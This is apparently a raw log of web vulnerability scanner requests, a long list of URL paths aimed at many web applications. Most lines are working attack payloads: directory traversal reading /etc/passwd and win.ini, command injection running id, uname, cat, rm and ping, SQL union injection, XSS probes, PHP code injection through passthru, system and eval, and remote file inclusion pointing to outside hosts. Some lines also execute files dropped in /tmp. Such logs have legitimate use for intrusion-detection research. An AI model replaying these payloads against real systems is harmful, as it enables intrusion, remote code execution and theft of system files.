/m5103snj.htm?
/o6ebbirj.html?
/opensiteadmin/scripts/classes/formmanager.php?path=http://192.168.202.96:8080/llumt7msyau5y?\x00
/examples/jsp/error/www/delivery/fc.php?max_type=../../../../../../../../../../etc/passwd\x00
/javascript/component.exe
/cgi-bin/inc/functions.inc.php?config[ppa_root_path]=/etc/passwd\x00
/main.php?logout="|ping,-w,7000,-n,1,1.2.3.4|rem,
/examples/jsp/jsp2/el/script/cat_for_gen.php?ad=1&ad_direct=../&m_for_racine=
/en-us/account/webappmon.exe?ins=nowait&act=natping&sel="255.255.255.255 & id&"
/user.php?caselist[bad_file.txt][path]=@rfiurl&command=cat /etc/passwd
/uvazfs7p.jsp?
/main.php?logout="&ping;-w;8000;-n;1;1.2.3.4&rem;
/d44uk9h2.jspa?
/javascript/n.exe
/gm_scripting/
/zabbix/frontends/php/locales.php?download=1&langto=1&extlang[".system('chmod+555+/tmp/jdvccfaqtd0;')."]=1
/main.php?logout=";uname >q32339726 #
/1r8cfrlf.cgi?
/en-us/s7qus4g3.asp?
/ciamos_path/modules/forum/include/config.php?module_cache_path='http://192.168.202.96:8080/ipb5ri?'
/0rufe52p.exe?
/cgi-sys/fileseek2.cgi?foot=....//....//....//....//....//....//....//etc/passwd&head=
/recordings/include/theme.inc.php?fullpath=/etc/passwd\x00
/scripts/c0kha6w3apd3.cgi
/script/fckeditor/editor/filemanager/browser/default/frmupload.html
/lsoix5h3.exe?
/horde/imp/mailbox.php3?actionid=6&server=x&imapuser=x';somesql&pass=x
/awstats/awstats.pl?migrate=|echo;chmod 777 /tmp/cegnlginfc.sh;echo|awstats842638.txt
/scripts/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331923200,0x3a,196871378),3,4,5,6,7,8,9,10,11,12,13,14,15,16
/scripts/tinfo.php?id=1332010409
/subscriptions.jsp
/jdx255ea.htm?
/i7prbs22.dll?
/main.php?stuff=&rm;q66756841&rem;
/dir_thatware/config.php?root_path=http://cirt.net/rfiinc.txt?'
/examples/jsp/jsp2/el/main.php?g2_view=zipcart.download&g2_file=../../../../../../../../../../../../etc/passwd
/fpnpp5zg.nsf?
/manager/cgiip.exe/wservice=wsbroker1/webutil/ping.p
/cgi-exe/htimage.exe/path/filename?2,2
/top.php?stuff="uname\x09>q19771951\x09#
/examples/jsp/cal/mail.php?id='/**/union/**/select/**/1,2,1331904464,4--&blog=1
/h5sc3gxy.pl?
/cgi-914/fileseek2.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd
/main.php?logout="\x0dsleep 9 #
/examples/jsp/num/welcome.php?custom_welcome_page=/etc/passwd\x00
/awstats/awstats.pl?migrate=|echo;/./tmp/gjvtlghpjb0 > /dev/null &;echo|awstats573600.txt
/main.php?logout=&uname\x09>q21614636\x09#
/examples/jsp/jsp2/jspx/index.php?album=../../../../../../../../../../etc/passwd\x00
/hipkz026.dll?
/scriptless/
/nyvbv05h.dll?
/index.php?configfile=../../../../../../../../../etc/passwd
/calendar.php?week=">
/moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+db+00+10+00+00+00+20+00+00+00+00+40+00+00+10+00+00+00+02+00+00+04+00+00+00+00++>>ctdn
/javascript/htpasswd.as
/"free market"/
/phpmyadmin/dcforum.cgi?az=list&forum=../../../../../../../etc/passwd\x00
/en-us/account/login?return_to=/en-us/manager/launcher/admin/directory?app_only=1&ns=xss
/help.php?q=ver,>q99682555&rem,
/l752x1ry.asp?
/main.php?logout='\x0ddel\x09q39919215\x09#
/en-us/h5sc3gxy.fts?
/yver8r9o.pl?
/recordings/tombstone.cfm?profileid=
/help.php?q="rm q85487167&rem
/en-us/33y9gcqq.htm?
/en-us/n9xlumt5.cfm?
/scripts/search/show.pl?url=http://www.google.com
/examples/servlets/servlet/ikonboard.cgi?act=st&f=1&t=1&hl=nessus&st='
/examples/jsp/sessions/search.cgi?..\..\..\..\..\..\windows\win.ini
/notify?from=nessus"|id"
/fmnveedu.x?
/d5a5renl.mscgi?
/ju0u7kfo.php3?
/javascript/document.manifest
/?
/cgi-915/webcart/webcart.cgi?change=yes&code=phold&config=mountain&nextpage=;cat /etc/passwd|
/fnwhrxyd.cfc?
/top.php?stuff="ping\x0b-w\x0b10000\x0b-n\x0b1\x0b4.3.2.1|rem\x0b
/..\..\..\
/scripts/carello/carello.dll
/examples/jsp/error/bb_func_txt.php?pathtofiles=/etc/passwd\x00
/recordings/wiki/edit.php?page=sandbox&suck_url=../kernel/config_inc.php&do_suck=h
/l4fz1dqw.jspa?
/javascript/transparent.exe
/dda2qr7j.mscgi?
/javascript/.passwd.tgz
/webspirs.cgi?sp.nextform=../../../../../../../../../etc/passwd
/esmozg5d.cfm?
/examples/jsp/error/mylog.html?screen=/etc/passwd
/bmeun223.php?
/recordings/home?dir=/&file=../../../../../../../../../../../../etc/passwd&lang=kor
/scripts/admin.pl
/en-us/
/javascript/.passwd/
/ghswfouu.nsf?
/sessiondescriptionprotocol/
/h4bi26jd.cgi?
/scripts/index.php?board=nonexistant1391471476
/static//..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215etc/passwd
/! cabella's big game hunter - alaskan adventure/
/cgi-bin/search/show.pl?url=file:/etc/passwd
/yef5f3d5.pl?
/javascript/creator.exe
/v3axg1p8.dll?
/egaet53a.cfc?
/scripts/2pwudii1mt22.asp
/yver8r9o.dll?
/?
/ddoworrl.jsp?
/examples/jsp/jsp2/el/welcome.php?custom_welcome_page=/etc/passwd\x00
/main.php?stuff='\x0drm\x09q61875212\x09#
/um7xpn15.php3?
/help.php?q="&del q34212187 #
/scgi-bin/a1stats/a1disp4.cgi?../../../../../../../etc/passwd
/javascript/htdocs.exe
/examples/jsp/sessions/cwmail.exe
/jujgxwav.pl?
/cgi-bin/index.asp?user='
/index.php?id=h6xj4vcok1'
/javascript/pivot.exe
/miz4r5hz.mscgi?
/phpmyadmin/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904366&lang_crm=../../vtigerservice.php\x00
/scripts/cc_guestbook.pl
//
/azcrfs8d.mscgi?
/t-script_4/
/javascript/author.exe
/phpmyadmin/documentation.html?phpmyadmin=csc3t31gos8q2h30o9cfk567d1lu5go1; passthru('id'); die
/examples/jsp/num/wikka.php?wakka=homepage/../../actions/wikkachanges
/phpmyadmin/shoutbox.php?conf=../
/jw64yq8u.idc?
/javascript/clk.exe
/main.php?frm_daynight=day&frm_passwd=&frm_referer=q68315591&frm_user=&scr_height=&scr_width=
/cgi-bin/mail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd\x00
/main.php?logout='uname >q44999749 #
/aj3pf49c.x?
/starnet/modules/sn_allbum/slideshow.php?cmsdir=/etc/passwd\x00
/examples/jsp/sessions/index.php?cat_select=
/cgi-bin/faq.php?action=&type=view&s=&id=-1' union select 0,475189625,0,0,0,0,0--
/phpmyadmin/download.php?language=/etc/passwd\x00
/cgi-bin/adlayer.php?layerstyle=../../../../../../../etc/passwd\x00
/directory.php?dir=;cat /etc/passwd
/examples/jsp/cal/googlesearch/googlesearch.php?app[path][lib]=/etc/passwd\x00
/ows-bin/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd\x00
/scripts/include/monitoring/engine/makexml.php?fileoreonconf=/etc/passwd\x00
/scripts/ui/login?user=nessus-1331908665
/main.php?stuff="rm\x0bq47639929&rem\x0b
/h5sc3gxy.jsp?
/a1stats/a1disp3.cgi?/../../../../../../etc/passwd
/fmnveedu.php?
/javascript/test2.exe
/examples/jsp/jsp2/jspx/c32web.exe/getimage?imagename=cart32.ini\x00.gif
/faq.php?action=&type=view&s=&id=-1' union select 0,1451427823,0,0,0,0,0--
/cgi-bin/k/home?dir=/&file=../../../../../../../../../../../../etc/passwd&lang=kor
/javascript/document.jhtml
/en-us/i686v90l.html?
/scripts/check-lom.php?etcdir=http://192.168.202.118:8080/moclyxlwqyfjnp?
/dagent/downloadreport.asp?agentid=1111&pass=2;select plus_downloadreport_sql_injections.nasl
/h5sc3gxy.idc?
/main.php?stuff='rm q95495989 #
/xsqln7eb.html?
/en-us/account/nucleus/libs/pluginadmin.php?globals[dir_libs]=/etc/passwd\x00
/main.php?logout="ping\x0b-w\x0b8000\x0b-n\x0b1\x0b1.2.3.4|rem\x0b
/fmnveedu.cfm?
/u8yiqilu.pl?
/5qnlm5z2.cfc?
/t7tm4m0b.asp?
/recordings/cgiwrap/cgiwrap_error_page_handling_xss.nasl
/awstats/awstats.pl?migrate=|echo;chmod 555 /tmp/xmefwyizyj0;echo|awstats302824.txt
/scripts/index.php?lng=../system_footer&sensor_program=phpsysinfo_241.nasl
/main.php?logout="&del,q77644543&rem,
/l13b77e5.php3?
/inc/download_center_lite.inc.php?script_root=http://192.168.202.118:8080/tzhfyzkbomspvm?
/x2gyorli.cgi?
/help.php?q="ver\x09>q57557316&rem\x09
/help.php?q='sleep 7 #
/9o6g5vkn.cfm?
/zln2hm2z.php3?
/rpc/..\xc1%8s..\xc1%8s..\xc1%8s..\xc1%8s..\xc1%8s../winnt/system32/cmd.exe?/c+dir+c:\+/og
/recordings/libraries/adodb/server.php?sql='adodb_sql_sql_injection.nasl
/main.php?stuff='\x0asleep\x098\x09#
/moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+db+4d+24+03+34+9f+8b+7d+28+f3+a6+61+75+17+8b+55+f8+8b+4d+fc+66+8b+04+5a+0f+bf++>>esbq
/examples/servlets/servlet/notify?from=nessus"|id"
/b4vng02k.cfc?
/javascript/.passwd.pm
/examples/jsp/checkbox/catalog.php?action=category_show&id='
/javascript/document.test
/scripts/index.php?string='
/javascript/.htpasswd.sfish/`false`
/bin/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd\x00
/recordings/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd\x00&bn=fm_d1
/cgi-bin/newsdesk.cgi?t=../../../../../../etc/passwd
/javascript/document.php3
/6wb70v0b.html?
/brian's_guide/
/cgi-bin/awstatstotals.php?sort="].passthru('id').exit().$a["
/scripts/r.cgi?file=../../../../../../../../../../etc/passwd
/sendcard.php?view=1&id='sendcard_sql.nasl
/examples/jsp/security/protected/is_cgi_installed3_j_security_check;jsessionid=5680ad1b9956cf0a8a9f08a20f983ee61586800228~
/3m5knyc4.do?
/scripts/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331909354,0x3a,1639211458),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
/squirrelcart/cart_content.php?cart_isp_root=/etc/passwd\x00
/phpmyadmin/passwd
/afpl ghostscript_information/
/scripts/samples/search/simple.idq
/ifip-description/
/main.php?stuff="|ping;-w;7000;-n;1;1.2.3.4|rem;
/d44uk9h2.asp?
/j4rdyhw8.pl?
/cgi-home/fileseek.cgi?foot=&head=;cat /etc/passwd|
/main.php?stuff='del q94914736 #
/examples/jsp/colors/index.php?gadget=glossary&action=viewterm&term=
/d765w06j.jspa?
//..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd
/moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+db+68+74+49+6e+66+68+4e+74+53+65+54+50+ff+54+24+38+50+8d+4c+24+30+6a+04+51+6a++>>ctdn
/um7xpn15.nsf?
/main.php?stuff="rm\x0cq43448647&rem\x0c
/9ko6m4c8.html?
/bl8sefdm.mscgi?
/examples/jsp/jsp2/el/error.php?selected_theme=
/edv3mapy.jsp?
/top.php?stuff="ping\x0b-w\x0b10000\x0b-n\x0b1\x0b1.2.3.4&rem\x0b
/help_text_vars.php?pgv_base_directory=../../../../../../../../../etc/passwd
/n9xlumt5.x?
/en-us/h5sc3gxy.cfc?
/en-us/account/cgiip.exe/wservice=wsbroker1/webtools/oscommand.w
/subscription-info/
/recordings/bandwidth/index.cgi?action=showmonth&year=&month=
/javascript/limit.exe
/y8pmygrp.asp?
/scripts/tomcat_proxy_directory_traversal.nasl1332010414
/xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('/./tmp/ezgnbzqprg.sh+>+/dev/null+&'); function v
/examples/jsp/checkbox/search.php?submit=true&search=');
/en-us/hipkz026.fts?
/?
/main.php?logout="ping\xa0-w\xa08000\xa0-n\xa01\xa01.2.3.4&rem\xa0
/examples/jsp/checkbox/am.pl?path=bin/mozilla&action=display_form&file=users/etc/passwd&login=root+login
/if69ddo1.cgi?
/i2n4v4rl.jspa?
/cgi-exe/gw5/gwweb.exe?help=bad-request
/uvazfs7p.aspx?
/examples/jsp/sessions/core/editor.php?editor_insert_bottom=/etc/passwd
/l13b77e5.exe?
/scripts/users/users.php
/cgi.cgi/c32web.exe/getimage?imagename=customeremail.txt\x00.pdf
/scripts/tinfo.php?id=1331904209
/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=http://192.168.202.118:8080/iroy1gvqrrqu??
/?
/javascript/publications.exe
/ewc3rz1l.dll?
/javascript/ignore.exe
/scripts/cleartrust/ct_logon.jsp?ctloginerrormsg=
/snippetmaster/includes/vars.inc.php?_session[script_path]=http://cirt.net/rfiinc.txt?
/cgi-bin/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331908877,462918967 --
/javascript/transport.exe
/javascript/document.exe
/cgis/nph-showlogs.pl?files=../../&filter=.*&linecnt=500&refresh=0&submit=go
/ap58k3ci.asp?
/<200603291315/
/top.php?stuff=ver,>q18885325&rem,
/eldredtranscript/
/examples/jsp/checkbox/insertorder.cfm?cfid=1&cftoken=1 union select 1,2,3,4,storename,6,7,8,9,10,11,12,13,14,15 from params"having 1=1
/vwmg565s.aspx?
/javascript/reminder.exe
/weq93ppb.mscgi?
/scripts/www/delivery/ac.php?bannerid=-1331904221+or+1=1+--+';passthru(base64_decode($_server[http_nessus_ngbfhgz5]));die;/*
/main.php?logout="ping;-w;7000;-n;1;4.3.2.1|rem;
/cacti/index.php?src=1&_common=1&time=1331905227&action=show_view&module=calendarmodule&view=../../../../../../../../../../etc/passwd\x00
/examples/jsp/num/shopexd.asp?catalogid='42
/cgi-bin/pdesk.cgi?lang=../../../../../../../../etc/passwd\x00
/opensiteadmin/scripts/classes/form.php?path=http://192.168.202.118:8080/iroy1gvqrrqu?\x00
/examples/jsp/error/sendtemp.pl?templ=../../../../../etc/passwd
/en-us/oie504mr.asp?
/scripts/adxmlrpc.php
/main.php?logout=ver\xa0>q14678363&rem\xa0
/cgi-sys/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd
/3hlysl2x.jspa?
/yef5f3d5.nsf?
/9kr0ih0v.mscgi?
/s7qus4g3.mscgi?
/tukodz3j.mscgi?
/main.php?logout="&uname\x09>q22899423\x09#
/help.php?q="ping\x09-w\x099000\x09-n\x091\x094.3.2.1|rem\x09
/javascript/howto.exe
/top.php?stuff=\x0auname >q51153423 #
/jujgxwav.cfc?
/examples/jsp/jsp2/el/include/theme.inc.php?fullpath=/etc/passwd\x00
/main.php?logout='&rm q25729498 #
/recordings/embed/day.php?path=/etc/passwd\x00
/awstats/awstats.pl?migrate=|echo;echo x;echo|awstats544698.txt
/en-us/9kr0ih0v.kspx?
/mv8wxfy9.kspx?
/javascript/gif.exe
/scripts/ion-p.exe?page=c:\\winnt\\win.ini
/scripts/slwebmail/showlogin.dll?language=fr
/scriptsentry/
/?
/javascript/23.exe
/cancelsubscription/
/en-us/33y9gcqq.dll?
/scripts/editor/filemanager/connectors/php/upload.php?command=fileupload&type=file¤tfolder=/fckeditor_currentfolder_file_upload-1331904249.php.
/main.php?logout="rm\x09q95413462&rem\x09
/phpmyadmin/documentation.html?phpmyadmin=file:///etc/passwd
/s7qus4g3.exe?
/examples/jsp/error/am.pl?path=bin/mozilla&action=display_form&file=users/etc/passwd&login=root+login
/javascript/icon.exe
/um7xpn15.fts?
/javascript/receive.exe
/top.php?stuff=";rm\x09q51581738\x09#
/main.php?logout="|ping,-w,8000,-n,1,1.2.3.4|rem,
/main.php?stuff="ping\xa0-w\xa08000\xa0-n\xa01\xa04.3.2.1|rem\xa0
/recordings/viewcvs.cgi/?cvsroot=
/htbin/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd\x00
/description_subhead/
/dir_thatware/config.php?root_path=http://192.168.202.118:8080/tzhfyzkbomspvm?'
/javascript/interim.exe
/javascript/decrypt.exe
/tuwjta1w.dll?
/main.php?stuff='\x0duname >q97623189 #
/b5xdqgz2.php?
/i2n4v4rl.asp?
/examples/jsp/sessions/demos/demo.browse.php?filename=/etc/passwd
/top.php?stuff='\x0arm q53951968 #
/examples/jsp/jsp2/el/snpfiltered.pl?t=c&u=
/examples/jsp/cal/welcome.php?custom_welcome_page=/etc/passwd\x00
/en-us/h5sc3gxy.dll?
/htdocs/../../../../../../../../../../../../../etc/passwd
/l752x1ry.asp?
/main.php?logout=&ver\x09>q12662543&rem\x09
/main.php?logout="&rm q75783223&rem
/zoomstats/libs/dbmax/mysql.php?globals['lib']['db']['path']=http://192.168.202.96:8080/4dckqcc0acprbz??
/web_store/web_store.cgi?page=../../../../../../etc/passwd\x00.html
/examples/jsp/jsp2/el/carbo.dll?icatcommand=..\..\..\..\..\..\winnt\win.ini&catalogname=catalog
/help.php?q='\x0drm\x09q57419215\x09#
/0w155a7c.php3?
/b5xdqgz2.fts?
/examples/jsp/cal/doc/index.php?s=/etc/passwd\x00
/main.php?stuff=ver\x0c>q68677588&rem\x0c
/help.php?q=&ver\xa0>q85836551&rem\xa0
/examples/jsp/colors/edit_image.php?dn=1&userfile=/etc/passwd&userfile_name= ;id;
/scripts/gtcatalog/password.inc
/606wkcop.html?
/examples/jsp/cal/jgs_portal_statistik.php?meinaction=themen&month=1&year=1'
/inc/download_center_lite.inc.php?script_root=http://192.168.202.96:8080/4dckqcc0acprbz?
/cgi-win/windmail.exe? -n c:\boot.ini hacker@hax0r.com | dir c:\\
/examples/jsp/num/ftp/ftp.pl?dir=../../../../../../etc
/examples/jsp/checkbox/login.php?course=">
/0qhcnefz.do?
/scripts/fgos1sb1c1tr.asp
/8t9v8k7x.html?
/byrg33fw.asp?
/main.php?logout="|ping\x09-w\x098000\x09-n\x091\x094.3.2.1|rem\x09
/en-us/33y9gcqq.asp?
/jujgxwav.cgi?
/cacti/cgiip.exe/wservice=wsbroker1/webtools/oscommand.w
/uvazfs7p.idc?
/en-us/9kr0ih0v.fts?
/scripts/search.jsp?q=%"
/viewimg.php?form=1&path=../../../../../../../../../../etc/passwd&var=1
/cgi-bin/gw5/gwweb.exe?help=bad-request
/scripts/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1332008595&lang_crm=../../vtigerservice.php\x00
/main.php?logout="|ping\x0b-w\x0b10000\x0b-n\x0b1\x0b4.3.2.1|rem\x0b
/irssi-script/
/main.php?stuff='\x0dsleep\x097\x09#
/doc/index.php?s=/etc/passwd\x00
/yacs/scripts/update_trailer.php?context[path_to_root]=@rfiurl?context[path_to_root]=@rfiurl?
/bl8sefdm.fts?
/main.php?logout=&ping;-w;8000;-n;1;1.2.3.4&rem;
/fo564rei.kspx?
/cacti/awstatstotals.php?sort="].passthru('id').exit().$a["
/main.php?stuff="ping\xa0-w\xa011000\xa0-n\xa01\xa01.2.3.4&rem\xa0
/recordings/review.php?id=1&cat=&subcat=">
/main.php?stuff="&del q33239588 #
/main.php?stuff=ver;>q96335299&rem;
/javascript/mem.exe
/7uz3ok60.cfm?
/job descriptions/
/scripts/index.php?page=documents&doc=-99' union select null,null,'nessus','dcpportal_sql.nasl',null,null,null,null,null,null,null,null--
/quagynka.idc?
/examples/jsp/num/mail.php?id='/**/union/**/select/**/1,2,1331904464,4--&blog=1
/scripts/news/index.dot?id=../../../../../../../../../../../..//boot.ini\x00.jpg
/azcrfs8d.cfm?
/scripts/cxvae_g3rjys.php
/scripts/directorypro.cgi?want=showcat&show=../../../../../etc/passwd\x00
/cgi-bin/webbbs/webbbs_config.pl?body=aaaaffff&email=test@example.com&followup=10;cat /etc/passwd&name=joe
/scripts/calendar.php?month=' union select 1,1,'1332008330','calendarix_month_sql_injection.nasl',1 #
/7dbjwpw6.html?
/javascript/.passwd.part
/examples/jsp/num/admin/general.php?mode=perlinfo&config[general][perl_binary]=cat /etc/passwd||
/phpmyadmin/documentation.html?phpmyadmin=/../..//../..//../..//../..//../..//etc/passwd\x00
/mcptranscript/
/javascript/.htaccess.sfish/"`false`"
/test.php?evalme=eval($_server[http_x_durgqrrwohhdlkkqd]);
/scripts/nckowqpd4zng.php3
/help.php?q='\x0duname >q95327467 #
/examples/jsp/checkbox/admin/general.php?mode=perlinfo&config[general][perl_binary]=cat /etc/passwd||
/cgi-local/cgiemail-1.6/cgicso?query=
/en-us/dda2qr7j.jsp?
/weq93ppb.aspx?
/javascript/phorum.exe
/b4vng02k.kspx?
/fcgi-bin/fileseek.cgi?foot=....//....//....//....//....//....//....//etc/passwd&head=
/php/mlog.html?screen=/etc/passwd
/main.php?logout="\x0auname >q86286812 #
/javascript/document.java
/?ilang=eng&sid=2"
/javascript/team.exe
/cgis/webcart/webcart.cgi?change=yes&code=phold&config=mountain&nextpage=;cat /etc/passwd|
/edv3mapy.php3?
/scripts/..\xc0%9v..\xc0%9v..\xc0%9v..\xc0%9v..\xc0%9v../winnt/system32/cmd.exe?/c+dir+c:\+/og
/examples/servlets/servlet/spaw/dialogs/confirm.php?spaw_root=/etc/passwd\x00
/jnv890lt.aspx?
/cgibin/pfdispaly.cgi?../../../../../../../../../../etc/passwd
/9ko6m4c8.x?
/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331908785&lang_crm=../../vtigerservice.php\x00
/manual/servlets/scripts/shoes/shoeform.htm
/moore's_law/
/33y9gcqq.mscgi?
/ewc3rz1l.php3?
/javascript/affiliate.exe
/examples/servlets/servlet/webplus.exe?script=webplus_install_path.nasl
/examples/jsp/jsp2/el/awstatstotals.php?sort="].passthru('id').exit().$a["
/top.php?stuff=\x0duname >q74771226 #
/index.php/content/search/?sectionid=3&searchtext=
/subscriptions.cfm
/javascript/mp.exe
/examples/jsp/jsp2/el/man-cgi?section=0&topic=ls;id
/examples/jsp/cal/edit.jsp?page=user&editor=../../../install
/main.php?logout="&del\x0bq19661861&rem\x0b
/cgi-914/gwweb.exe?help=bad-request
/8x6w469u.cfc?
/phpmyadmin/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1332008595&lang_crm=../../../../../../../../../../../..//etc/passwd\x00
/main.php?stuff=|ping;-w;9000;-n;1;1.2.3.4|rem;
/scripts/unlg1.1
/lsoix5h3.mscgi?
/zabbix/frontends/php/locales.php?download=1&langto=1&extlang[".system('chmod+555+/tmp/xvvpghsokp0;')."]=1
/examples/jsp/error/viewpage.php?file=/etc/passwd
/examples/jsp/jsp2/jspx/k/home?dir=/&file=../../../../../../../../../../../../etc/passwd&lang=kor
/en-us/oie504mr.do?
/cfide/scripts/ajax/fckeditor/editor/filemanager/connectors/cfm/upload.cfm?command=fileupload&type=file¤tfolder=/reqtgy.jsp\x00
/examples/jsp/jsp2/jspx/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904365&lang_crm=../../../../../../../../../../../..//etc/passwd\x00
/awstats/awstats.pl?migrate=|echo;/./tmp/lcqujjmwty.sh;echo|awstats344911.txt
/cgi-915/r.cgi?file=../../../../../../../../../../etc/passwd
/scripts/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331905034&lang_crm=../../../../../../../../../../../..//etc/passwd\x00
/t578vqea.fts?
/examples/jsp/colors/cart32.exe
/ttxssh2_218/
/main.php?stuff="ping -w 11000 -n 1 1.2.3.4&rem
/en-us/oie504mr.nsf?
/main.php?stuff="del\x09q51339959\x09#
/script_path/config.inc.php?_path=http://cirt.net/rfiinc.txt??
/script/gestion/index.php?path_inc=http://cirt.net/rfiinc.txt?
/xsqln7eb.nsf?
/cacti/index.php?gadget=glossary&action=viewterm&term=
/recordings/workarea/contentdesigner/ekformsiframe.aspx?id=">
/scripts/gotopage.cgi?4242+../../../../../../../../../../../../../etc/passwd
/606wkcop.fts?
/examples/jsp/error/?">
/phpmyadmin/libraries/adodb/server.php?sql='adodb_sql_sql_injection.nasl
/tukodz3j.dll?
/cgi-bin/alibaba.pl|dir ..\\..\\..\\..\\..\\..\\..\\,
/0u75ldxq.asp?
/um7xpn15.pl?
/en-us/33y9gcqq.jsp?
/main.php?logout='\x0auname >q64819443 #
/j734qobz.cfm?
/examples/jsp/error/index2.cgi?frames=yes&board=demo&mode=current&threads=collapse&message=../../../../../../../../../../etc/passwd\x00
/apavxugx.fts?
/ao22ww7y.aspx?
/subscriptionmailsignup/
/lsoix5h3.asp?
/init.php?scriptpath=http://192.168.202.118:8080/zz5thkvtmlgl??
/
/zv8tv7h8.aspx?
/javascript/cs.exe
/main.php?stuff="rm\x0cq95513284&rem\x0c
/w4996nr0.php?
/_vti_bin/fpcount.exe/
/scripts/cevvxrxqxc_b.shtml
/main.php?stuff=;del q81835212 #
/fpnpp5zg.x?
/en-us/.cgi
/n1afe1y6.jsp?
/cgi-915/fileseek2.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd
/examples/jsp/error/?mod=read&id=../../../../../../../../../../../../../etc/passwd\x00
/en-us/7o5qp766.cfm?
/examples/jsp/checkbox/commsrss.php?files[0]=../../../../../../../../../../../../etc/passwd
/managesubscriptions/
/javascript/restore.exe
/main.php?stuff=&ver >q34994933&rem
/javascript/messages.exe
/examples/jsp/error/embed/day.php?path=/etc/passwd\x00
/
/podtranscript/
/examples/jsp/num/ncbook.cgi?action=default¤t=|cat /etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
/l13b77e5.asp?
/scripts/6gl21a1hiz3s.php3
/source?v=../../../../../../../../../../etc/passwd\x00
/9kr0ih0v.cgi?
/y8pmygrp.aspx?
/al_initialize.php?alpath=/etc/passwd\x00
/top.php?stuff='\x0arm\x09q46955555\x09#
/dir_thatware/config.php?root_path=http://192.168.202.96:8080/no4ghqiguzhst?'
/ny1b3qq4.htm?
/ht8pn8uq.html?
/rbec2ohx.htm?
/um7xpn15.exe?
/top.php?stuff="rm,q55729425&rem,
/examples/jsp/checkbox/awstatstotals.php?sort={${phpinfo()}}{${exit()}}
/phpmyadmin/logbook.pl?file=../../../../../../../../../../bin/cat /etc/passwd\x00|
/cgi-bin/classes/adodbt/sql.php?classes_dir=/etc/passwd\x00
/bl8sefdm.asp?
/w4996nr0.cgi?
/product_descriptions/
/jw64yq8u.php3?
/examples/jsp/cal/popup.php?include_path=/etc/passwd\x00
/cgi-bin/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1331905161
/examples/jsp/jsp2/jspx/index.php?sensor_program=
/82q7ywa8.dll?
/top.php?stuff="&uname\x09>q22847462\x09#
/top.php?stuff="sleep 10 #
/scripts///admin.html
/scripts/sc877q2pzqne.asp
/javascript/jessica.exe
/javascript/bofh.exe
/main.php?logout='&rm\x09q65543975\x09#
/main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.26.202/main.php&frm_user=&scr_height=&scr_width=q82299952
/issue_description/
/main.php?logout=ver\x0c>q23587427&rem\x0c
/examples/jsp/colors/resetpw.php?email=../../../../../../../../../../../../etc/passwd
/main.php?logout="ping\x0c-w\x0c9000\x0c-n\x0c1\x0c1.2.3.4&rem\x0c
/top.php?stuff="&ping\x0b-w\x0b8000\x0b-n\x0b1\x0b1.2.3.4&rem\x0b
/scripts/gbadmin.cgi?action=colors
/index.php?module=
/cyclobenzaprine-description/
/main.php?stuff=&ver,>q56966143&rem,
/qhvu0pdg.asp?
/help.php?q='\x0auname\x09>q87897781\x09#
/examples/jsp/colors/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../etc/passwd
/main.php
/en-us/hipkz026.x?
/javascript/notifications.exe
/scriptingnewsdirectory/
/mpcgi/fileseek2.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd
/qhvu0pdg.do?
/guestbook_script/
/tk21352-scriptlet_tools/
/scripts/.%2e/..5cwinnt/system32/cmd.exe?/x+/c+copy \winnt\system32\cmd.exe vp56.exe
/i2n4v4rl.dll?
/javascript/rakefile.exe
/examples/jsp/colors/library/adodb/server.php?sql='adodb_sql_sql_injection.nasl
/examples/jsp/num/base_qry_common.php?base_path=/etc/passwd\x00
/htbin/powerup/r.cgi?file=../../../../../../../../../../etc/passwd
/yef5f3d5.aspx?
/html/chatheader.php?mainfile=anything&default_theme='
/phpmyadmin/engine/admin/admin.php?id_user=../../../../../../../../../etc/passwd
/examples/jsp/cal/rss.php?blogid=1&profile=../../config/config.properties.php\x00
/weq93ppb.nsf?
/women's rights in islam - modernising or outdated/
/en-us/.htm
/main.php?stuff="del\xa0q63696925&rem\xa0
/wscripts/
/b5xdqgz2.jsp?
/u8yiqilu.jspa?
/thvgjebp.passwd
/news.php?config[script_path]=@rfiurl?config[script_path]=@rfiurl?
/scripts/cfide/probe.cfm
/top.php?stuff=;
/y8pmygrp.jsp?
/l13b77e5.jspa?
/htbin/texis.exe/junk
/.jsp
/mpcgi/windmail.exe? -n c:\boot.ini hacker@hax0r.com | dir c:\\
/_vti_bin/..\xc0\xaf../..\xc0\xaf../..\xc0\xaf../winnt/system32/cmd.exe?/c+dir
/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904366&lang_crm=../../../../../../../../../../../..//etc/passwd\x00
/actionscript/
/u95h6ymu.x?
/recordings/gotopage.cgi?4242+../../../../../../../../../../../../../etc/passwd
/scripts/fpadmin.htm
/main.php?logout="ver\x09>q86373985&rem\x09
> hashdum
/azcrfs8d.pl?
/javascript/iphone.exe
/ftp/ftp.pl?dir=../../../../../../etc
/h5sc3gxy.jsp?
/606wkcop.dll?
